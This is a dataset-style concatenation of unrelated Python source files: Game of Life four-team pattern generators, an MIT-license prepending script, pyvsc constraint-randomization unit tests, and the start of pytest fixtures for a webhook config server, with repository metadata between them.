patterns_list_all[team_ix] = team_patterns_list
# Q4
pattern = get_grid_pattern(
methuselah,
rows,
cols,
xoffset=centerx + centerx // 2 + random.randint(start, end),
yoffset=centery + random.randint(-L, L),
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[3]
team_patterns_list = patterns_list_all[team_ix]
team_patterns_list.append(pattern)
patterns_list_all[team_ix] = team_patterns_list
pattern_unions = [pattern_union(pl) for pl in patterns_list_all]
return tuple(pattern_unions)
def rainbow_methuselah_quadrants_pattern(
rows, cols, seed=None, methuselah_counts=None, fixed_methuselah=None
):
"""
Add methuselahs to each quadrant.
If the user does not specify any args,
this fills the quadrants with lots of
small methuselahs.
The user can specify which methuselahs
to use and how many to use, so e.g.
can specify 1 methuselah per quadrant, etc.
"""
# set rng seed (optional)
if seed is not None:
random.seed(seed)
small_methuselah_names = [
"bheptomino",
"cheptomino",
"eheptomino",
"piheptomino",
"rpentomino",
]
reg_methuselah_names = [
"acorn",
"bheptomino",
"cheptomino",
"eheptomino",
"multuminparvo",
"piheptomino",
"rabbit",
"rpentomino",
]
BIGDIMLIMIT = 150
mindim = min(rows, cols)
if methuselah_counts is None:
if mindim < BIGDIMLIMIT:
methuselah_counts = [3, 4, 9]
else:
methuselah_counts = [3, 4, 9, 16]
if fixed_methuselah is None:
if mindim < BIGDIMLIMIT:
methuselah_names = reg_methuselah_names + small_methuselah_names
else:
methuselah_names = small_methuselah_names
else:
methuselah_names = [fixed_methuselah]
valid_mc = [1, 2, 3, 4, 9, 16]
for mc in methuselah_counts:
if mc not in valid_mc:
msg = "Invalid methuselah counts passed: must be in {', '.join(valid_mc)}\n"
msg += "you specified {', '.join(methuselah_counts)}"
raise GollyXPatternsError(msg)
# Put a cluster of methuselahs in each quadrant,
# one quadrant per team.
# Procedure:
# place random methuselah patterns in each quadrant corner
# Store each quadrant and its upper left corner in (rows from top, cols from left) format
quadrants = [
(1, (0, cols // 2)),
(2, (0, 0)),
(3, (rows // 2, 0)),
(4, (rows // 2, cols // 2)),
]
rotdegs = [0, 90, 180, 270]
all_methuselahs = []
for iq, quad in enumerate(quadrants):
count = random.choice(methuselah_counts)
if count == 1:
# Only one methuselah in this quadrant, so use the center
jitterx = 4
jittery = 4
corner = quadrants[iq][1]
y = corner[0] + rows // 4 + random.randint(-jittery, jittery)
x = corner[1] + cols // 4 + random.randint(-jitterx, jitterx)
meth = random.choice(methuselah_names)
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 2 or count == 4:
# Two or four methuselahs in this quadrant, so place at corners of a square
# Form the square by cutting the quadrant into thirds
if count == 4:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
# Slices and partitions form the inside square
nslices = 2
nparts = nslices + 1
posdiag = bool(random.getrandbits(1))
for a in range(1, nparts):
for b in range(1, nparts):
proceed = False
if count == 2:
if (posdiag and a == b) or (
not posdiag and a == (nslices - b + 1)
):
proceed = True
elif count == 4:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nparts)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nparts)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 3 or count == 9:
# Three or nine methuselahs, place these on a square with three points per side
# or eight points total
if count == 9:
jitterx = 3
jittery = 3
else:
jitterx = 5
jittery = 5
corner = quadrants[iq][1]
nslices = 4
for a in range(1, nslices):
for b in range(1, nslices):
proceed = False
if count == 3:
if a == b:
proceed = True
elif count == 9:
proceed = True
if proceed:
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
elif count == 16:
# Sixteen methuselahs, place these on a 4x4 square
jitterx = 2
jittery = 2
corner = quadrants[iq][1]
nslices = 5
for a in range(1, nslices):
for b in range(1, nslices):
y = (
corner[0]
+ a * ((rows // 2) // nslices)
+ random.randint(-jittery, jittery)
)
x = (
corner[1]
+ b * ((cols // 2) // nslices)
+ random.randint(-jitterx, jitterx)
)
meth = random.choice(methuselah_names)
try:
pattern = get_grid_pattern(
meth,
rows,
cols,
xoffset=x,
yoffset=y,
hflip=bool(random.getrandbits(1)),
vflip=bool(random.getrandbits(1)),
rotdeg=random.choice(rotdegs),
)
except GollyXPatternsError:
raise GollyXPatternsError(
f"Error with methuselah {meth}: cannot fit"
)
livecount = get_pattern_livecount(meth)
all_methuselahs.append((livecount, pattern))
random.shuffle(all_methuselahs)
# Sort by number of live cells
all_methuselahs.sort(key=itemgetter(0), reverse=True)
team1_patterns = []
team2_patterns = []
team3_patterns = []
team4_patterns = []
asc = [1, 2, 3, 4]
ascrev = list(reversed(asc))
serpentine_pattern = asc + ascrev
for i, (_, methuselah_pattern) in enumerate(all_methuselahs):
serpix = i % len(serpentine_pattern)
serpteam = serpentine_pattern[serpix]
if serpteam == 1:
team1_patterns.append(methuselah_pattern)
elif serpteam == 2:
team2_patterns.append(methuselah_pattern)
elif serpteam == 3:
team3_patterns.append(methuselah_pattern)
elif serpteam == 4:
team4_patterns.append(methuselah_pattern)
team1_pattern = pattern_union(team1_patterns)
team2_pattern = pattern_union(team2_patterns)
team3_pattern = pattern_union(team3_patterns)
team4_pattern = pattern_union(team4_patterns)
return team1_pattern, team2_pattern, team3_pattern, team4_pattern
#############
# Map methods
def random_fourcolor(rows, cols, seed=None):
"""
Generate a random four-color list life initialization.
Returns: four listlife strings,
with the random initializations.
(8-20% of all cells are alive).
Strategy: generate a set of (x,y) tuples,
convert to list, split in four. Use those
point sets to create listLife URL strings.
"""
if seed is not None:
random.seed(seed)
density = random.randint(8, 18) / 100.0
ncells = rows * cols
nlivecells = 4 * ((density * ncells) // 4)
points = set()
while len(points) < nlivecells:
randy = random.randint(0, rows - 1)
randx = random.randint(0, cols - 1)
points.add((randx, randy))
points = list(points)
pattern_urls = []
# Loop over each team
for i in range(4):
# Subselection of points
q = len(points) // 4
start_ix = i * q
end_ix = (i + 1) * q
this_points = set(points[start_ix:end_ix])
# Assemble pattern
this_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in this_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
this_pattern.append(this_rowstr)
this_url = pattern2url(this_pattern)
pattern_urls.append(this_url)
return tuple(pattern_urls)
@retry_on_failure
def randommethuselahs_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_methuselah_quadrants_pattern(rows, cols, seed)
result = (pattern2url(pat) for pat in patterns)
return result
@retry_on_failure
def orchard_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [4, 9]
else:
mc = [4, 9, 16]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="acorn"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def justyna_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mc = [1]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="justyna"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def rabbits_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [1, 2]
else:
mc = [1, 2, 3]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="rabbit"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def multum_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
if mindim < 150:
mc = [1, 2]
else:
mc = [2, 3, 4]
count = random.choice(mc)
patterns = rainbow_methuselah_quadrants_pattern(
rows, cols, seed, methuselah_counts=[count], fixed_methuselah="multuminparvo"
)
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def eightx_fourcolor(rows, cols, seed=None):
fmap = {
"eightb": _eightb_fourcolor,
"eightc": _eightc_fourcolor,
"eighte": _eighte_fourcolor,
"eightr": _eightr_fourcolor,
"eightpi": _eightpi_fourcolor,
}
k = random.choice(list(fmap.keys()))
return fmap[k](rows, cols, seed)
def _eightb_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "bheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightc_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "cheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eighte_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "eheptomino", spacing=7)
urls = (pattern2url(p) for p in patterns)
return urls
def _eightpi_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "piheptomino")
urls = (pattern2url(p) for p in patterns)
return urls
def _eightr_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
patterns = rainbow_jitteryrow_pattern(rows, cols, seed, "rpentomino")
urls = (pattern2url(p) for p in patterns)
return urls
@retry_on_failure
def patiolights_fourcolor(rows, cols, seed=None):
"""
Patio lights pattern is a line segments with boxes placed randomly along the segment, like a string of lights
"""
if seed is not None:
random.seed(seed)
urls = []
thickness = random.randint(2, 3)
nteams = 4
# Find the y locations of each light string:
# Divide rows into Nteams + 1 parts with Nteams slices
# Place the light strings at the slices
jittery = 5
lightstring_ys = [
((i + 1) * rows) // (nteams + 1) + random.randint(-jittery, jittery)
for i in range(nteams)
]
# Randomize order of light string team assignments
random.shuffle(lightstring_ys)
# I dunno
def _get_bounds(z, dim):
zstart = z - dim // 2
zend = z + (dim - dim // 2)
return zstart, zend
for iteam in range(nteams):
team_pattern = get_grid_empty(rows, cols, flat=False)
# Assemble the light string
lightstring_y = lightstring_ys[iteam]
for ix in range(0, cols):
for iy in range(lightstring_y - 1, lightstring_y + thickness):
team_pattern[iy][ix] = "o"
for ix in range(0, cols):
for iy in range(lightstring_y - 1, lightstring_y + thickness):
team_pattern[iy][ix] = "o"
# Add some lights to the string
jitterx = 4
bounds = (lightstring_y - 1, lightstring_y + thickness)
maxy = max(bounds)
miny = min(bounds)
ylightstop = miny - random.randint(2, 3)
ylightsbot = maxy + random.randint(2, 3)
ix = random.randint(4, 12)
while ix < cols - 1:
if random.random() < 0.50:
team_pattern[ylightsbot][ix] = "o"
team_pattern[ylightsbot][ix + 1] = "o"
team_pattern[ylightsbot + 1][ix] = "o"
team_pattern[ylightsbot + 1][ix + 1] = "o"
else:
team_pattern[ylightstop][ix] = "o"
team_pattern[ylightstop][ix + 1] = "o"
team_pattern[ylightstop - 1][ix] = "o"
team_pattern[ylightstop - 1][ix + 1] = "o"
ix += random.randint(10, 12) + random.randint(-jitterx, jitterx)
pattern_url = pattern2url(team_pattern)
urls.append(pattern_url)
return tuple(urls)
@retry_on_failure
def rainbow_fourcolor(rows, cols, seed=None):
return _rainburst_fourcolor(rows, cols, seed, sunburst=False)
@retry_on_failure
def sunburst_fourcolor(rows, cols, seed=None):
return _rainburst_fourcolor(rows, cols, seed, sunburst=True)
def _rainburst_fourcolor(rows, cols, seed=None, sunburst=False):
"""
Create a Gaussian normal distribution in the top left and bottom right quadrants,
then slice it into radial pieces, which makes a nice rainbow shape.
"""
SMOL = 1e-12
if seed is not None:
random.seed(seed)
# Algorithm:
# set the slope
# generate (x, y) points
# if slope < 1/g, A
# if slope < 1, B
# if slope < g: C
# else: D
density = random.randint(8, 18)/100.0
nteams = 4
ncells = rows * cols
npointsperteam = (ncells//nteams)*density
nlivecells = nteams*npointsperteam
centerx = cols // 2
centery = rows // 2
teams_points = []
g = 2.5
slope_checks = [
0,
1/g,
1,
g,
]
urls = []
for iteam in range(nteams):
team_points = set()
while len(team_points) < npointsperteam:
randx = int(random.gauss(centerx, centerx // 2))
randy = int(random.gauss(centery, centery // 2))
slope = (randy - centery) / (randx - centerx + SMOL)
if iteam==0:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==1:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==2:
if slope > slope_checks[iteam] and slope < slope_checks[iteam+1]:
team_points.add((randx, randy))
elif iteam==3:
if slope > slope_checks[iteam]:
team_points.add((randx, randy))
team_pattern = []
for y in range(rows):
team_row = []
for x in range(cols):
if (x, y) in team_points:
team_row.append("o")
else:
team_row.append(".")
team_row_str = "".join(team_row)
team_pattern.append(team_row_str)
if sunburst and iteam%2==0:
team_pattern = vflip_pattern(team_pattern)
team_url = pattern2url(team_pattern)
urls.append(team_url)
random.shuffle(urls)
return tuple(urls)
@retry_on_failure
def timebomb_fourcolor(rows, cols, seed=None):
return _timebomb_fourcolor(rows, cols, revenge=False, seed=seed)
@retry_on_failure
def timebomb2_fourcolor(rows, cols, seed=None):
return _timebomb_fourcolor(rows, cols, revenge=True, seed=seed)
def _timebomb_fourcolor(rows, cols, revenge, seed=None):
if seed is not None:
random.seed(seed)
mindim = min(rows, cols)
# Geometry
# L = length scale
L = 20
centerx = cols // 2
centery = rows // 2
# Each team gets one oscillator and one timebomb
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
def _get_oscillator_name():
if revenge:
oscillators = ["airforce", "koksgalaxy", "dinnertable", "vring64", "harbor"]
which_oscillator = random.choice(oscillators)
else:
which_oscillator = "quadrupleburloaferimeter"
return which_oscillator
rotdegs = [0, 90, 180, 270]
urls = [None, None, None, None]
for iteam in range(nteams):
# Location:
# x = center + a*L
# y = center + b*L
# QI: a = 1, b = 1
# QII: a = -1, b = 1
# QIII: a = -1, b = -1
# QIV: a = 1, b = -1
if iteam==0 or iteam==3:
a = 1
else:
a = -1
if iteam==0 or iteam==1:
b = 1
else:
b = -1
osc_x = centerx + a*L
osc_y = centery + b*L
bomb_x = centerx + 2*a*L
bomb_y = centery + 2*b*L
# jitter for patterns
osc_jitter_x = 3
osc_jitter_y = 3
timebomb_jitter_x = 6
timebomb_jitter_y = 6
osc_pattern = get_grid_pattern(
_get_oscillator_name(),
rows,
cols,
xoffset=osc_x + random.randint(-osc_jitter_x, osc_jitter_x),
yoffset=osc_y + random.randint(-osc_jitter_y, osc_jitter_y),
rotdeg=random.choice(rotdegs),
)
bomb_pattern = get_grid_pattern(
"timebomb",
rows,
cols,
xoffset=bomb_x + random.randint(-timebomb_jitter_x, timebomb_jitter_x),
yoffset=bomb_y + random.randint(-timebomb_jitter_y, timebomb_jitter_y),
rotdeg=random.choice(rotdegs),
)
team_pattern = pattern_union([osc_pattern, bomb_pattern])
team_url = pattern2url(team_pattern)
team_ix = team_assignments[iteam]
urls[team_ix] = team_url
return tuple(urls)
def crabs_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
rotdegs = [0, 90, 180, 270]
jitter = 1
# 8 crabs total
centerys = [rows//4, 3*rows//4]
centerxs = [cols//5, 2*cols//5, 3*cols//5, 4*cols//5]
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
crab_patterns = [[], [], [], []]
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
imod4 = i%4
crabcenterx = centerx + random.randint(-jitter, jitter)
crabcentery = centery + random.randint(-jitter, jitter)
crab = get_grid_pattern(
"crabstretcher",
rows,
cols,
xoffset=crabcenterx,
yoffset=crabcentery,
hflip=(random.random() < 0.5),
vflip=(random.random() < 0.5),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[imod4]
team_pattern = crab_patterns[team_ix]
team_pattern.append(crab)
crab_patterns[team_ix] = team_pattern
pattern_unions = [pattern_union(pl) for pl in crab_patterns]
urls = [pattern2url(pu) for pu in pattern_unions]
return tuple(urls)
def quadgaussian_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
# Lower bound of 0.10, upper bound of 0.15
density = 0.10 + random.random() * 0.05
ncells = rows * cols
nlivecells = ((ncells * density)//4)*4
nlivecellspt = nlivecells // 4
# Variable blobbiness
stdx = cols// random.randint(8, 16)
stdy = rows// random.randint(8, 16)
jitter = 5
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
centerxs = [cols//4, 3*cols//4]
centerys = [rows//4, 3*rows//4]
urls = [None, None, None, None]
master_points = set()
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
team_ix = team_assignments[i]
cx = centerx + random.randint(-jitter, jitter)
cy = centery + random.randint(-jitter, jitter)
team_points = set()
while len(team_points) < nlivecellspt:
randx = int(random.gauss(cx, stdx))
randy = int(random.gauss(cy, stdy))
if (randx >= 0 and randx < cols) and (randy >= 0 and randy < rows):
if (randx, randy) not in master_points:
team_points.add((randx, randy))
master_points.add((randx, randy))
# Assemble the circle dot diagram for team
team_pattern = []
for y in range(rows):
this_row = []
for x in range(cols):
if (x, y) in team_points:
this_row.append("o")
else:
this_row.append(".")
this_rowstr = "".join(this_row)
team_pattern.append(this_rowstr)
team_url = pattern2url(team_pattern)
urls[team_ix] = team_url
return tuple(urls)
#@retry_on_failure
def rainbowmath_fourcolor(rows, cols, seed=None):
if seed is not None:
random.seed(seed)
def is_prime(n):
n = abs(n)
if n == 2 or n == 3: return True
if n < 2 or n%2 == 0: return False
if n < 9: return True
if n%3 == 0: return False
r = int(n**0.5)
# since all primes > 3 are of the form 6n ± 1
# start with f=5 (which is prime)
# and test f, f+2 for being prime
# then loop by 6.
f = 5
while f <= r:
if n % f == 0: return False
if n % (f+2) == 0: return False
f += 6
return True
def is_not_prime(n):
return not is_prime(n)
# Random choice of which form to use
coin = random.randint(1,8)
if coin == 1:
p = random.choice([k*k for k in [5, 7, 9, 11]])
f = lambda x, y: int(is_not_prime((x*x & y*y) % p))
elif coin == 2:
# Linked diagonals of boxes
ab = [3, 4, 5]
a = random.choice(ab)
b = random.choice(ab)
cs = [16, 18, 20, 22]
c = random.choice(cs)
p = 7
f = lambda x, y: int((x//a ^ y//a)*c % p)
elif coin == 3:
# Linked diagonals of very large boxes
ab = [9, 10, 11]
a = random.choice(ab)
b = random.choice(ab)
cs = [16, 18, 20, 22]
c = random.choice(cs)
p = 7
f = lambda x, y: int((x//a ^ y//a)*c % p)
elif coin == 4:
# Sterpinsky triangles
ps = [7, 11, 13, 15, 35, 37]
p = random.choice(ps)
f = lambda x, y: int((x & y) % p)
elif coin == 5:
# This is a one-off that's in perfect sync and makes wild patterns
a = 3
b = 3
p = 99
f = lambda x, y: int((a**x)%p & (b**y)%p)
elif coin == 6:
a = random.randint(1,10)
b = random.randint(1,10)
p = 99
f = lambda x, y: int(is_not_prime((a*x & b*y) % p))
elif coin == 7:
ps = [81, 83, 85, 87, 89, 91, 93, 95, 97, 99]
p = random.choice(ps)
f = lambda x, y: int(is_not_prime((x//(y+1) ^ y) % p))
elif coin == 8:
ps = [69, 99, 299, 699, 999]
p = random.choice(ps)
f = lambda x, y: int(is_not_prime((x*x//(y+1)) % p))
xoffset = 0
yoffset = 0
team_patterns = _expression_pattern(
rows,
cols,
seed,
f,
xoffset=xoffset,
yoffset=yoffset,
)
urls = [pattern2url(pat) for pat in team_patterns]
for url in urls:
if url == "[]":
raise GollyXPatternsError("Error with bitfield: everything is empty")
return tuple(urls)
def _expression_pattern(
rows,
cols,
seed,
f_handle,
xoffset=0,
yoffset=0,
):
nteams = 4
# These store the the .o diagrams (flat=False means these are lists of lists of one char)
team_patterns = []
for i in range(nteams):
tp = get_grid_empty(rows,cols,flat=False)
team_patterns.append(tp)
# Assemble a list of cells that are alive at the roots of f (if f returns 0)
coordinates = []
for xtrue in range(0, cols):
for ytrue in range(0, rows):
xtransform = xtrue - xoffset
ytransform = ytrue - yoffset
if f_handle(xtransform, ytransform) == 0:
coordinates.append((xtrue, ytrue))
# Shuffle live cell cordinates
random.shuffle(coordinates)
# Assign live cell coordinates to teams using serpentine pattern
team_order = list(range(nteams))
random.shuffle(team_order)
serpentine_pattern = list(team_order) + list(reversed(team_order))
for i, (x, y) in enumerate(coordinates):
serp_ix = i % len(serpentine_pattern)
team_ix = serpentine_pattern[serp_ix]
team_patterns[team_ix][y][x] = "o"
return team_patterns
| 27.946895
| 113
| 0.540562
| 0
| 0
| 0
| 0
| 5,212
| 0.152362
| 0
| 0
| 4,265
| 0.124678
|
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638
| 2,962
|
py
|
Python
|
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
filemanipulator.py
|
paulkramme/mit-license-adder
|
1865413c1932a3108883dc2b77c67608d56be275
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
class FileModifierError(Exception):
pass
class FileModifier(object):
def __init__(self, fname):
self.__write_dict = {}
self.__filename = fname
self.__tempfile = tempfile.TemporaryFile()
with open(fname, 'rb') as fp:
for line in fp:
self.__tempfile.write(line)
self.__tempfile.seek(0)
def write(self, s, line_number = 'END'):
if line_number != 'END' and not isinstance(line_number, (int, float)):
raise FileModifierError("Line number %s is not a valid number" % line_number)
try:
self.__write_dict[line_number].append(s)
except KeyError:
self.__write_dict[line_number] = [s]
def writeline(self, s, line_number = 'END'):
self.write('%s\n' % s, line_number)
def writelines(self, s, line_number = 'END'):
for ln in s:
self.writeline(s, line_number)
def __popline(self, index, fp):
try:
ilines = self.__write_dict.pop(index)
for line in ilines:
fp.write(line)
except KeyError:
pass
def close(self):
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
with open(self.__filename,'w') as fp:
for index, line in enumerate(self.__tempfile.readlines()):
self.__popline(index, fp)
fp.write(line)
for index in sorted(self.__write_dict):
for line in self.__write_dict[index]:
fp.write(line)
self.__tempfile.close()
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
with FileModifier(filename) as fp:
fp.writeline(mit_license, 0)
| 32.911111
| 89
| 0.668467
| 1,648
| 0.556381
| 0
| 0
| 0
| 0
| 0
| 0
| 1,222
| 0.412559
|
a1e520db04d481d770fcb8c7ed4dbac6d857ce44
| 4,048
|
py
|
Python
|
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
ve/unit/test_list_scalar.py
|
aneels3/pyvsc
|
692fa2baa9cc0251411b3a8ace2854b7e65c288a
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Jun 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListScalar(VscTestCase):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.fixed = vsc.rand_list_t(vsc.bit_t(8), sz=4)
self.dynamic = vsc.randsz_list_t(vsc.bit_t(8))
self.queue = vsc.randsz_list_t(vsc.bit_t(8))
def test_randsz_smoke(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
self.l[1] == (self.l[0]+1)
it = my_item_c()
it.randomize()
print("it.l.size=" + str(it.l.size))
for i,v in enumerate(it.l):
print("v[" + str(i) + "] = " + str(v))
self.assertEqual(it.l[1], it.l[0]+1)
def test_randsz_len(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
self.l[1] == (self.l[0]+1)
it = my_item_c()
it.randomize()
self.assertGreaterEqual(len(it.l), 2)
self.assertLessEqual(len(it.l), 10)
print("it.l.size=" + str(it.l.size))
for i,v in enumerate(it.l):
print("v[" + str(i) + "] = " + str(v))
self.assertEqual(it.l[1], it.l[0]+1)
def test_randsz_foreach_idx(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
self.a = vsc.rand_uint8_t()
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
with vsc.foreach(self.l, it=False, idx=True) as idx:
with vsc.if_then(idx > 0):
self.l[idx] == self.l[idx-1]+1
it = my_item_c()
it.randomize()
for i in range(len(it.l)):
if i > 0:
self.assertEqual(it.l[i], it.l[i-1]+1)
def test_fixedsz_foreach_idx(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
self.temp = vsc.list_t(vsc.uint8_t())
self.temp = [1,3,4,12,13,14]
@vsc.constraint
def ab_c(self):
self.a in vsc.rangelist(1,2,3)
with vsc.foreach(self.temp, idx=True) as i:
self.a != self.temp[i]
it = my_item_c()
for i in range(10):
it.randomize()
self.assertEqual(it.a, 2)
def disabled_test_sum_simple(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.rand_list_t(vsc.uint8_t(), sz=5)
self.a = vsc.rand_uint8_t()
@vsc.constraint
def sum_c(self):
self.l.sum == 5
with vsc.foreach(self.l) as it:
it != 0
it = my_item_c()
it.randomize()
print("Model: " + ModelPrettyPrinter.print(it.get_model()))
self.assertEqual(it.l.sum, 5)
| 27.726027
| 68
| 0.447381
| 3,873
| 0.956769
| 0
| 0
| 2,376
| 0.586957
| 0
| 0
| 103
| 0.025445
|
a1e5a8c1e742d2b35abb789d741addea637b7ba0
| 5,344
|
py
|
Python
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | 2
|
2017-11-21T11:16:44.000Z
|
2022-01-05T23:17:50.000Z
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | 14
|
2017-10-17T16:05:39.000Z
|
2022-02-12T02:42:49.000Z
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | null | null | null |
import json
from configserver import ConfigServer, get_postgres_db
from configserver.errors import InvalidRouteUUIDError
from flask.testing import FlaskClient
import pytest
from peewee import SqliteDatabase
import logging
from uuid import uuid4
import functools
from typing import Iterable
@pytest.fixture(autouse=True)
def no_logs():
logging.getLogger().setLevel(logging.WARNING)
@pytest.fixture()
def webhook_server():
with open("config.json") as config_file:
config_JSON = json.load(config_file)
server = ConfigServer(
use_test_auth=True,
db=get_postgres_db(),
config_JSON=config_JSON
)
yield server
server.close()
@pytest.fixture()
def user_auth():
return {
"headers": {
"user": f"test_user{uuid4()}@example.ac.uk"
}
}
@pytest.fixture()
def router_app(webhook_server, user_auth):
test_client = webhook_server.app.app.test_client() # type: FlaskClient
class PatchedFlaskClient:
get = functools.partialmethod(test_client.get, **user_auth)
delete = functools.partialmethod(test_client.delete, **user_auth)
post = functools.partialmethod(test_client.post, **user_auth)
